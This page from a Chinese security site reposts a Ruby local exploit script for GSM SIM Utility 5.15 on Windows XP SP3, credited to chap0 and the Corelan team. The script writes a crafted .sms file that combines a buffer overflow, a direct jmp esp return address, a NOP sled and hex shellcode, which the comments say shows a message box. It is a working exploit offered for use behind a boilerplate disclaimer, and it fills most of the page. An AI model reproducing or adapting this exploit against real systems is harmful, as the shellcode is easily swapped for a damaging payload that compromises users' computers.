首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GSM SIM Utility Local Exploit Direct Ret ver
来源:www.seek-truth.net 作者:chap0 发布时间:2010-07-08  

# Exploit Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Date          : July 07, 2010
# Author        : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version       : 5.15
# OS            : Windows XP SP3
# Greetz to     : Corelan Security Team
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew      : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
#!/usr/bin/ruby
puts '|------------------------------------------------------------------|'
puts '|                         __               __                      |'
puts '|   _________  ________  / /___ _____     / /____  ____ _____ ___  |'
puts '|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |'
puts '| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |'
puts '| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |'
puts '|                                                                  |'
puts '|                                       http://www.corelan.be:8800 |'
puts '|                                                                  |'
puts '|-------------------------------------------------[ EIP Hunters ]--|'
puts '[*] GSM SIM Utility Local Exploit Direct Ret ver. by chap0.'
puts '[*] Visit seek-truth.net'

crash = "A" * 810
eip = "01524000" #jmp esp
nop = "90" * 10
#message box
code ="d9eb9bd97424f431d2b27a31c964"+
"8b71308b760c8b761c8b46088b7e"+
"208b36384f1875f35901d1ffe160"+
"8b6c24248b453c8b54057801ea8b"+
"4a188b5a2001ebe337498b348b01"+
"ee31ff31c0fcac84c0740ac1cf0d"+
"01c7e9f1ffffff3b7c242875de8b"+
"5a2401eb668b0c4b8b5a1c01eb8b"+
"048b01e88944241c61c3b20829d4"+
"89e589c2688e4e0eec52e89cffff"+
"ff894504bb7ed8e273871c2452e8"+
"8bffffff894508686c6c20ff6833"+
"322e646875736572885c240a89e6"+
"56ff550489c250bba8a24dbc871c"+
"2452e85effffff68703058206820"+
"6368616864206279686f69746568"+
"4578706c31db885c241289e36868"+
"5820206844656174682069732068"+
"2053696e6873206f666857616765"+
"685468652031c9884c241989e131"+
"d252535152ffd031c050ff5508"

payload = crash + eip + nop + code

sms = File.new( "directret.sms", "w" )
 if sms
 sms.syswrite(payload)
 else
 puts "Unable to create file."
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hero DVD Remote Buffer Overflo
·ARM Polymorphic execve("/bin/s
·HP NNM 7.53 ovwebsnmpsrv.exe B
·IrcDelphi Daemon Server Denial
·EvoCam Web Server OSX ROP Remo
·EA Battlefield 2 and Battlefie
·minerCPP 0.4b Remote BOF+Forma
·Qt 4.6.3 "QSslSocketBackendPri
·Opera Exploit v10.60 Denial of
·VLC Media Player version 1.0.5
·linux/x86 bind port to 6678 XO
·NetworX version 1.0.3 suffers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved